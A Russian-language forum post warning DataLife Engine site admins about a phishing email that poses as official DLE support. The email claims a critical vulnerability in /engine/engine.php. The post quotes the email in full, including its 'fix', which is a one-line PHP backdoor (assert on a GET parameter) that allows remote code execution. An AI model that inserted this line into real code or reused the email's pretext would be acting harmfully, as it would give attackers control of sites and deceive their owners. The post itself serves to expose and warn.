Показать сообщение отдельно
Старый 24.10.2014, 20:29 Вверх   #1
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
Восклицание Внимание!!! Развод админов на счет уязвимости /engine/engine.php

Сегодня получил письмо в котором сообщалось от имени официального сайта DLE о критической уязвимости. Вот только отправлено оно было с формы обратной связи. Если Вы получите данное письмо - знайте. Это попытка взлома Вашего сайта через банальный развод администратора.

Данное письмо вам отправил support@dle-news.ru с сайта http://rutut.com/

------------------------------------------------
Текст сообщения
------------------------------------------------

Здравствуйте, уважаемый клиент!



Благодарим Вас за использование на Вашем сайте rutut.com нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: rutut.com/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);


С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 162.244.33.213
  Ответить с цитированием
2 пользователя(ей) сказали cпасибо:
 
Время генерации страницы 0.04442 секунды с 10 запросами